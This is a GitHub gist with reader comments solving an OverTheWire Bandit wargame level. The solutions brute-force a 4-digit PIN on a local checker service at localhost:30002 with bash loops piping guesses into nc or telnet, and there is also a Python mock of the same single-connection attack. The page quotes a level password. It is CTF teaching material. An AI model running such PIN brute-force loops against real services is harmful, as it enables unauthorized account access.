Gist: vinzdef/7bdf4249e67a2ff7ed3f
for x in {0..9}{0..9}{0..9}{0..9}; do
  echo UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $x | telnet localhost 30002 | egrep -v "Exiting|Wrong|I am";
  echo "Try $x";
done
#! /bin/bash
counter=0
# start from clean scratch files (-f so a missing file is not an error)
rm -f /tmp/res /tmp/tmpFile
for i in {0..9}{0..9}{0..9}{0..9}; do
  (( counter++ ))
  if (( counter > 1000 )); then
    # takes the brute-force attempts we've written to file and pipes them to netcat (can only handle about 1000 lines at a time)
    # then appends its output to the file res
    echo "sending 1000 attempts to nc and writing to /tmp/res"
    cat /tmp/tmpFile | nc localhost 30002 >>/tmp/res
    # breaks the loop once it finds the password; the answer is printed outside the loop
    if grep -q "The password of user bandit25 is" /tmp/res; then
      break
    fi
    # overwrite the existing tmpFile with the current attempt and reset the counter for the next thousand
    echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" > /tmp/tmpFile
    let counter=0
    echo "$counter"
  else
    # writes all brute-force attempts to /tmp/tmpFile until it reaches 1000
    echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> /tmp/tmpFile
  fi
done
# the last partial batch never reaches 1000 entries, so send it too (unless the loop already found the answer)
if ! grep -q "The password of user bandit25 is" /tmp/res; then
  cat /tmp/tmpFile | nc localhost 30002 >>/tmp/res
fi
# Our answer (the original had "echo cat /tmp/res", which printed the literal text instead of the file)
grep "The password of user bandit25 is" /tmp/res
I generated a file with all possible combinations with this script:
#!/bin/bash
passwd="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
for a in {0..9}{0..9}{0..9}{0..9}
do
echo $passwd' '$a >> combinations.txt
done
Then run a simple command that sends all possible combinations over a single nc connection, which is much faster than everything I've seen here (and even simpler, I guess?).
cat combinations.txt | nc localhost 30002 >> result.txt
You can easily find the only different line (so the one containing the password) using
sort result.txt | uniq -u
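As an added illustration (my code, not the gist's and not Fieel's), here is the same approach modelled in Python so the two things that make it fast are visible: the checker answers line after line on one connection without throttling or disconnecting, so all 10000 candidates ride a single session instead of 10000 separate connections, and because every failed guess yields the same reply, the one-off lines stand out exactly as with sort | uniq -u. Everything here is constructed: a socketpair stands in for the TCP connection to localhost:30002, the PIN 4242 and the password placeholder are invented, and the reply texts are built around the "I am the pincode", "Wrong" and "Exiting." fragments quoted on this page. Only the current password string is taken from the page. A service that capped attempts per connection or per source would break this batching; this mock deliberately does neither, which is what the level relies on.

```python
import socket
import threading
from collections import Counter

# Constructed stand-in for the level's checker: the real PIN and the bandit25
# password are not on this page, so both are placeholders.
SECRET_PIN = "4242"
PASSWORD_LINE = "The password of user bandit25 is <password-placeholder>"
CURRENT_PASSWORD = "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"  # the value quoted on the page

BANNER = "I am the pincode checker for user bandit25."
WRONG = "Wrong! Please enter the correct current password and pincode. Try again."


def serve_checker(conn):
    """Mock checker on an already-connected socket. Like the real level it
    answers one line at a time and never throttles or drops the session,
    which is exactly why a single nc session can carry all 10000 guesses."""
    with conn, conn.makefile("rb") as reader:
        conn.sendall(BANNER.encode() + b"\n")
        for raw in reader:  # one guess per line, until the client half-closes
            if raw.decode().split() == [CURRENT_PASSWORD, SECRET_PIN]:
                conn.sendall(b"Correct!\n" + PASSWORD_LINE.encode() + b"\n")
            else:
                conn.sendall(WRONG.encode() + b"\n")
        conn.sendall(b"Exiting.\n")


def _pump(sock, payload):
    """Write the whole batch from a helper thread, then half-close so the
    server sees EOF; a separate thread avoids a write/write deadlock when
    both sides fill their socket buffers."""
    try:
        sock.sendall(payload)
        sock.shutdown(socket.SHUT_WR)
    except OSError:
        pass


def brute_force_pin(sock, password):
    """Send every 4-digit candidate over ONE connection (the cat file | nc
    approach above) and read every reply back. Returns (pin, replies).
    Reply 0 is the banner and reply k+1 answers candidate k, so the pin is
    recovered from the position of 'Correct!'."""
    payload = "".join(f"{password} {pin:04d}\n" for pin in range(10000)).encode()
    writer = threading.Thread(target=_pump, args=(sock, payload))
    writer.start()
    with sock.makefile("rb") as reader:
        replies = reader.read().decode().splitlines()
    writer.join()
    pin = None
    if "Correct!" in replies:
        pin = f"{replies.index('Correct!') - 1:04d}"
    return pin, replies


def odd_lines_out(lines):
    """The 'sort result.txt | uniq -u' step: every failed guess produces the
    same reply, so whatever appears exactly once is the signal."""
    counts = Counter(lines)
    return sorted(line for line, n in counts.items() if n == 1)


def run_demo():
    """Wire the mock checker to the client over a socketpair (constructed
    stand-in for nc localhost 30002) and return what the client learned."""
    client_end, server_end = socket.socketpair()
    server = threading.Thread(target=serve_checker, args=(server_end,), daemon=True)
    server.start()
    with client_end:
        pin, replies = brute_force_pin(client_end, CURRENT_PASSWORD)
    server.join()
    return {"pin": pin, "unique": odd_lines_out(replies), "replies": len(replies)}


if __name__ == "__main__":
    result = run_demo()
    print(result["pin"], result["unique"])
```

Note that sort | uniq -u also surfaces the banner and "Exiting." lines, since they too occur once per session; the password line is still easy to spot among the four, which is what the comment relies on.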
One-liner:
for i in {0000..9999}; do echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002 | grep -v "I am the pincode" | grep -v "Exiting." | grep -v "Wrong"; done
seq -f %04g 10000 | xargs printf "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ %s\n" | nc localhost 30002 | grep bandit25
Fieel's answer is by far the best.
I combined all of the steps into a single script with 2-second sleeps between the major steps and I got the password much faster than some of the other solutions. It is interesting that netcat can handle so many attempts at once. It's almost like it was designed for brute forcing...
I guess I could have actually made the txt files from inside the script and made them writable as well to improve on the script.
#!/bin/bash
# the password variable was not shown in the comment; value taken from the scripts above
passwd="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
for a in {0..9}{0..9}{0..9}{0..9}; do
  echo "$passwd $a" >> combinations.txt
done
sleep 2.0
cat combinations.txt | nc localhost 30002 >> result.txt
sleep 2.0
sort result.txt | uniq -u
Hi! Great job with this. I noticed it was a tad slow as a brute force attack, so I switched the nc to be telnet and it went WAY faster. Seeing as how people who are stuck on this level may come here seeking help, would you mind making the small update?